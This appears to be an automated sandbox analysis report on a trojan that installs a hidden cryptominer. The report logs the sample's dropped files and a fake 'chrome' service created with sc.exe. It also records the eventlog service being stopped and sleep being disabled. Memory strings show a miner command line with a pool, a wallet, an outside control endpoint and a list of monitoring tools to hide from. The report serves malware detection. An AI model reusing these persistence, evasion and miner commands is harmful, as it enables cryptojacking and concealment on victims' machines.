          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2844:120:WilError_03
          Source: C:\ProgramData\MicrosoftEdge\Edgee.exeFile created: C:\Windows\TEMP\egfvwbuzpbvz.sysJump to behavior
          Source: SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeReversingLabs: Detection: 81%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "chrome"
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "chrome" binpath= "C:\ProgramData\MicrosoftEdge\Edgee.exe" start= "auto"
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "chrome"
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\ProgramData\MicrosoftEdge\Edgee.exe C:\ProgramData\MicrosoftEdge\Edgee.exe
          Source: C:\ProgramData\MicrosoftEdge\Edgee.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\ProgramData\MicrosoftEdge\Edgee.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\MicrosoftEdge\Edgee.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          Source: C:\ProgramData\MicrosoftEdge\Edgee.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\MicrosoftEdge\Edgee.exeProcess created: C:\Windows\System32\svchost.exe svchost.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "chrome"Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "chrome" binpath= "C:\ProgramData\MicrosoftEdge\Edgee.exe" start= "auto"Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "chrome"Jump to behavior
          Source: C:\ProgramData\MicrosoftEdge\Edgee.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\MicrosoftEdge\Edgee.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
          Source: C:\ProgramData\MicrosoftEdge\Edgee.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\MicrosoftEdge\Edgee.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
          Source: C:\ProgramData\MicrosoftEdge\Edgee.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
          Source: C:\ProgramData\MicrosoftEdge\Edgee.exeProcess created: C:\Windows\System32\svchost.exe svchost.exeJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\ProgramData\MicrosoftEdge\Edgee.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeStatic PE information: Image base 0x140000000 > 0x60000000
          Source: SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeStatic file information: File size 2625024 > 1048576
          Source: SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x277600
          Source: SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: Edgee.exe, 00000011.00000003.1727656008.000001D6C0E60000.00000004.00000001.00020000.00000000.sdmp, egfvwbuzpbvz.sys.17.dr
          Source: SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeStatic PE information: section name: .00cfg
          Source: Edgee.exe.0.drStatic PE information: section name: .00cfg
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeCode function: 0_2_00007FF64FE01394 push qword ptr [00007FF64FE0A004h]; ret 0_2_00007FF64FE01403
          Source: C:\ProgramData\MicrosoftEdge\Edgee.exeCode function: 17_2_00007FF6D96D1394 push qword ptr [00007FF6D96DA004h]; ret 17_2_00007FF6D96D1403
          Source: C:\Windows\System32\conhost.exeCode function: 23_2_0000000140001394 push qword ptr [0000000140008004h]; ret 23_2_0000000140001403

          Persistence and Installation Behavior

          barindex
          Source: C:\ProgramData\MicrosoftEdge\Edgee.exeFile created: C:\Windows\TEMP\egfvwbuzpbvz.sysJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeFile created: C:\ProgramData\MicrosoftEdge\Edgee.exeJump to dropped file
          Source: C:\ProgramData\MicrosoftEdge\Edgee.exeFile created: C:\Windows\Temp\egfvwbuzpbvz.sysJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeFile created: C:\ProgramData\MicrosoftEdge\Edgee.exeJump to dropped file
          Source: C:\ProgramData\MicrosoftEdge\Edgee.exeFile created: C:\Windows\Temp\egfvwbuzpbvz.sysJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "chrome"
          Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformationJump to behavior
          Source: svchost.exe, 0000001B.00000002.2979872536.000001693E02F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
          Source: svchost.exe, 0000001B.00000002.2979872536.000001693E02F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X/0 --URL=POOL.SUPPORTXMR.COM:3333 --USER="4335MEZGWWSMBW161UQP6WAQYXZTRVXWSBPKZPXTXXAH4MTOXXBIERHGBAB8XHDZAEMKWWVNP49WWK5RIBJ37AK2AZKAEKR" --PASS="CW" --CPU-MAX-THREADS-HINT=30 --CINIT-WINRING="EGFVWBUZPBVZ.SYS" --RANDOMX-NO-RDMSR --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-API="HTTP://83.217.209.235/YZYZYZYZNZNNZNZXNCXZHZXCHZCXHCXZHZXCHZCXZXCJJKASDJKSAJKDSA/API/ENDPOINT.PHP" --CINIT-VERSION="3.4.1" --CINIT-IDLE-WAIT=10 --CINIT-IDLE-CPU=70 --CINIT-ID="WVRYIKMMHSKMHXZL"
          Source: svchost.exe, 0000001B.00000002.2979872536.000001693E02F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
          Source: svchost.exe, 0000001B.00000002.2979959714.000001693E083000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEDLL
          Source: svchost.exe, 0000001B.00000002.2979872536.000001693E02F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE9
